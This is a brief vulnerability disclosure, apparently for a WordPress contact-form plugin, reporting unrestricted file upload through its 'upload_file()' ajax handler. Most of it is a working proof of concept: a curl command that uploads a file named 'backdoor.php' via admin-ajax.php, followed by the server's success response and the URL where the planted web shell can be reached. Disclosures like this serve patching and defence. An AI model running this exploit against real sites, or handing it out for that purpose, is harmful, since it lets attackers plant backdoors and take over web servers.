The “upload_file()” ajax function is affected from unrestricted file upload vulnerability.
curl -k -X POST -F “action=upload” -F “Filedata=@./backdoor.php” -F “action=nm_webcontact_upload_file” http://www.example.com/wp-admin/admin-ajax.php Response: {“status”:“uploaded”,“filename”:“1427927588-backdoor.php”} http://www.example.com/wp-content/uploads/contact_files/1427927588-backdoor.php